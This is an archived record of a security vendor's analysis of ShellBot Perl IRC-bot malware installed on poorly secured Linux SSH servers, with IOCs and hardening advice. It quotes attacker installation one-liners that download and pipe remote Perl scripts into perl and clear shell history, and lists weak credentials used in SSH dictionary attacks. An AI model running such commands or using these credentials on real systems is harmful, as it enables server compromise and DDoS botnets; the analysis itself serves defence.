{
	"id": "a09705e7-842b-49c8-a006-2b7c83658bb8",
	"created_at": "2026-04-06T00:15:46.381549Z",
	"updated_at": "2026-04-10T03:21:23.996033Z",
	"deleted_at": null,
	"sha1_hash": "b6cd0ec9bf5df882d7c995caa2d0c19caafca4a1",
	"title": "ShellBot Malware Being Distributed to Linux SSH Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1670370,
	"plain_text": "ShellBot Malware Being Distributed to Linux SSH Servers\r\nBy ATCP\r\nPublished: 2023-03-12 · Archived: 2026-04-05 21:40:06 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently discovered the ShellBot malware being\r\ninstalled on poorly managed Linux SSH servers. ShellBot, also known as PerlBot, is a DDoS Bot malware\r\ndeveloped in Perl and characteristically uses IRC protocol to communicate with the C\u0026C server. ShellBot is an\r\nold malware that has been in steady use and is still being used today to launch attacks against Linux systems.\r\n1. Attack Campaigns Against Linux SSH Servers\r\nUnlike desktop, which is the main work environment for normal users, servers usually take charge of providing\r\nspecific services. Accordingly, malware attacks are typically carried out through web browsers or email\r\nattachments in desktop environments, and threat actors also distribute malware disguised as legitimate software to\r\ninduce users to install them. Threat actors attacking server environments use a different method since there are\r\nlimits to distributing malware in the ways mentioned above. Services that are poorly managed or are weak to\r\nvulnerability exploitations because they have not been patched to the latest version are the prime targets.\r\nA main example of a poorly managed service is one where simple account credentials are used, causing the server\r\nto be vulnerable to dictionary attacks. Remote Desktop Protocol (RDP) and MS-SQL service are prime examples\r\nof attack vectors that are used when targeting Windows operating systems. In Linux servers, Secure Shell (SSH)\r\nservices are usually targeted for attacks. In IoT environments where an old Linux server or embedded Linux OS\r\nhas been installed, the Telnet service becomes targeted for dictionary attacks.\r\nThe ShellBot malware strains that are going to be covered in this post are believed to have been installed after\r\nthreat actors used account credentials that have been obtained through the use of scanners and SSH BruteForce\r\nmalware on target systems. After scanning systems that have operational port 22s, threat actors search for systems\r\nwhere the SSH service is active and uses a list of commonly used SSH account credentials to initiate their\r\ndictionary attack. The following is a list of the actual account credentials used by threat actors who install\r\nShellBot. (A far greater number of account credentials were used in the actual attacks, but only the main examples\r\nwere organized here.)\r\nUser Password\r\ndeploy password\r\nhadoop hadoop\r\noracle oracle\r\nroot 11111\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 1 of 9\n\nUser Password\r\nroot Passw0rd\r\nttx ttx2011\r\nubnt ubnt\r\nTable 1. A portion of the account credentials used by ShellBot operators\r\n2. Internet Relay Chat (IRC) Protocol\r\nA characteristic of ShellBot, aside from the fact that it is developed in Perl, is that it uses an IRC protocol to\r\ncommunicate with C\u0026C servers. IRC is a real-time Internet chat protocol developed in 1988. Users log onto\r\ncertain channels of certain IRC servers and chat with other users who have logged onto the same channel in real\r\ntime.\r\nIRC Bot is a bot malware that abuses this IRC service to communicate with C\u0026C servers. The IRC Bot installed\r\non the infected system accesses an IRC server’s channel designated by the threat actor according to the IRC\r\nprotocol, after which it transmits stolen information to the specified channel, or when the attacker enters a\r\nparticular string, receives this as a command and performs the corresponding malicious behavior.\r\nIRC has seen consistent use from malware since the past as it uses a preexisting IRC protocol and IRC server\r\nwithout having to develop a separate C\u0026C server and protocol. Although it has been seeing less use by malware\r\ntargeting Windows operating systems, a large number of IRC Bots are still being distributed on Linux.\r\n3. ShellBot Analysis\r\nShellBot has been used by various threat actors for a considerable amount of time, and a previous ASEC Blog post\r\ncovered its use in attacks along with CoinMiners.\r\nAnother characteristic of ShellBot is the fact that they all have different forms and features since threat actors can\r\ncustomize them. The team has categorized ShellBot into three main types based on recent findings and\r\nsummarized the commands, characteristics, and DDoS attacks the malware uses during installation.\r\n3.1. LiGhT’s Modded perlbot v2\r\nThe following is a ShellBot named “LiGhT’s Modded perlbot v2”.\r\nFigure 1. ShellBot version information\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 2 of 9\n\n“LiGhT’s Modded perlbot v2” is being used by a variety of threat actors. The following commands are used in the\r\nShellBot installation after the SSH server has been successfully logged into.\r\nFilename Installation Command\r\nak wget -qO – x-x-x[.]online/ak|perl\r\nperl\r\nnproc; nvidia-smi –list-gpus ;cd /tmp;wget -qO –\r\n http://34.225[.]57.146/futai/perl|perl;rm -rf perl\r\nmperl cd /tmp ; wget 193.233.202[.]219/mperl ; perl mperl ; rm -rf mperl\r\nniko2 cd /tmp ; wget 193.233.202[.]219/niko1 ; perl niko1 ; rm -rf niko1\r\nTable 2. Command used to install LiGhT’s Modded perlbot v2\r\nConfiguration data such as the C\u0026C server and the name of the channel to join are included in the initial routine\r\nof ShellBot. A nickname with the format “IP-[5 random digits]” is used to join the IRC channels.\r\nFigure 2. Configuration data of ShellBot\r\nFilename C\u0026C URL Channel Name\r\nak 164.90.240[.]68:6667 #nou\r\nper 164.132.224[.]207:80 #mailbomb\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 3 of 9\n\nFilename C\u0026C URL Channel Name\r\nmperl 206.189.139[.]152:6667 #Q\r\nniko1 176.123.2[.]3:6667 #X\r\nTable 3. C\u0026C URL and channels of LiGhT’s Modded perlbot v2\r\nThe “LiGhT’s Modded perlbot v2” version of ShellBot offers various features which are largely categorized in the\r\ntable below. Commands that can actually be used for malicious purposes include DDoS commands such as TCP,\r\nUDP, and HTTP Flooding. It also includes a variety of commands that allows control over infected systems so that\r\nthey can be used in other attacks such as reverse shell, log deletion, and scanner.\r\nCommand (Category) Description\r\nflooding IRC Flooding\r\nirc IRC control commands\r\nddos\r\nDDoS commands\r\nTCP, UDP, HTTP, SQL Flooding, etc.\r\nnews DDoS attack commands against security web pages\r\nhacking\r\nAttack commands\r\nMultiScan, Socks5, LogCleaner, Nmap, Reverse Shell, etc.\r\nlinuxhelp Help\r\nextras Additional features (Assumed to be related to DDoS attacks)\r\nversion Version information output\r\nTable 4. Features supported by LiGhT’s Modded perlbot v2\r\n3.2. DDoS PBot v2.0\r\nAside from “LiGhT’s Modded perlbot v2”, “DDoS PBot v2.0” is also being used in a variety of attacks. A\r\ncharacteristic of “DDoS PBot v2.0” is that it shows basic information and available commands in the annotations\r\nthat can be seen during its initial routine.\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 4 of 9\n\nFigure 3. Initial routine of DDoS PBot v2.0\r\nThe following are commands used to install “DDoS PBot v2.0”.\r\nFilename Installation Command\r\nbash wget -qO – 80.94.92[.]241/bash|perl\r\ntest.jpg\r\nuname -a;wget -q -O- hxxp://185.161.208[.]234/test.jpg|perl;curl -sS\r\nhxxp://185.161.208[.]234/test.jpg|perl;nproc;history -c\r\ndred\r\nuname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L\r\nhxxp://39.165.53[.]17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred\r\nTable 5. Commands used to install DDoS PBot v2.0\r\n“DDoS PBot v2.0” randomly chooses a nickname from a selection of over 500, which include “abbore”, “ably”,\r\nand “abyss”, before joining an IRC channel.\r\nFigure 4. List of DDoS PBot v2.0 nicknames\r\nFilename C\u0026C URL Channel Name\r\nbash 51.195.42[.]59:8080 #sex\r\ntest.jpg gsm.ftp[.]sh:1080 #test\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 5 of 9\n\nFilename C\u0026C URL Channel Name\r\ndred 192.3.141[.]163:6667 #bigfalus\r\nTable 6. C\u0026C URL and channels of DDoS PBot v2.0\r\nAdditionally, regular IRC Bots receive commands from the threat actor via the IRC channels to perform malicious\r\nacts. Thus, there is a need to verify the threat actor sending commands. Without a verification process, any users\r\ncan join the channel and control the bots however they want.\r\nIn order to do this, the IRC Bot has to perform an additional task where users that have joined the channel must\r\nverify their nickname and host address before they can enter a command. For example, in the case of the “bash”\r\nmalware, the nickname must be either “crond,” “drugs,” or “tab” as defined in the “admins” variable, while the\r\nhost address must be “localhost” as defined in the “hostauth” variable.\r\nFigure 5. Configuration data of DDoS PBot v2.0\r\nLike regular ShellBots, “DDoS PBot v2.0” also offers a variety of malicious commands including DDoS attack\r\ncommands.\r\nCommand (Category) Description\r\nsystem Infected system information output\r\nversion Version information output\r\nchannel IRC control commands\r\nflood\r\nDDoS commands\r\nTCP, UDP, HTTP, SQL Flooding, etc.\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 6 of 9\n\nCommand (Category) Description\r\nutils\r\nAttack commands\r\nPort Scan, Reverse Shell, file download, etc.\r\nTable 7. Features supported by DDoS PBot v2.0\r\n3.3. PowerBots (C) GohacK\r\nThe main characteristic of PowerBots is that it has a simpler form in comparison to the ShellBot types covered\r\nabove.\r\nFigure 6. Configuration data of PowerBots\r\nFilename Installation Command\r\nff uname -a ;wget -qO – hxxp://80.68.196[.]6/ff|perl \u0026\u003e\u003e/dev/null\r\nTable 8. Command used to install PowerBots\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 7 of 9\n\nFilename C\u0026C URL Channel Name\r\nff 49.212.234[.]206:3303 #x\r\nTable 9. C\u0026C URL and channel of DDoS PBot v2.0\r\nShellBot types usually offer a variety of DDoS attack features, but since PowerBots mainly focuses on its reverse\r\nshell and file downloading capabilities, it is likely that the threat actor installed ShellBot as a backdoor.\r\nCommand Description\r\nps Port scanning\r\nnamp NMAP port scanning\r\nrm Delete files in a particular path\r\nversion Version information output\r\ndown File download\r\nudp UDP Flooding attack\r\nback Reverse Shell\r\nTable 10. Features supported by PowerBots\r\n4. Conclusion\r\nRecently, threat actors have been installing variants of the ShellBot malware on inadequately managed Linux SSH\r\nservers. These types of attacks have been occurring consistently since the past and numerous attacks are still being\r\nconfirmed. If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific\r\ntargets after receiving a command from the threat actor. Moreover, the threat actor could use various other\r\nbackdoor features to install additional malware or launch different types of attacks from the compromised server.\r\nBecause of this, administrators should use passwords that are difficult to guess for their accounts and change them\r\nperiodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest\r\npatch to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for\r\nservers accessible from outside to restrict access by attackers. Finally, V3 should be updated to the latest version\r\nso that malware infection can be prevented.\r\nFile Detection\r\n– Shellbot/Perl.Generic.S1100 (2020.02.12.00)\r\n– Shellbot/Perl.Generic.S1118 (2020.02.19.07)\r\nMD5\r\n176ebfc431daa903ef83e69934759212\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 8 of 9\n\n2cf90bf5b61d605c116ce4715551b7a3\r\n3eef28005943fee77f48ac6ba633740d\r\n55e5bfa75d72e9b579e59c00eaeb6922\r\n6d2c754760ccd6e078de931f472c0f72\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//164[.]132[.]224[.]207/\r\nhttp[:]//164[.]90[.]240[.]68[:]6667/\r\nhttp[:]//176[.]123[.]2[.]3[:]6667/\r\nhttp[:]//185[.]161[.]208[.]234/test[.]jpg\r\nhttp[:]//192[.]3[.]141[.]163[:]6667/\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/49769/\r\nhttps://asec.ahnlab.com/en/49769/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/49769/"
	],
	"report_names": [
		"49769"
	],
	"threat_actors": [],
	"ts_created_at": 1775434546,
	"ts_updated_at": 1775791283,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b6cd0ec9bf5df882d7c995caa2d0c19caafca4a1.pdf",
		"text": "https://archive.orkl.eu/b6cd0ec9bf5df882d7c995caa2d0c19caafca4a1.txt",
		"img": "https://archive.orkl.eu/b6cd0ec9bf5df882d7c995caa2d0c19caafca4a1.jpg"
	}
}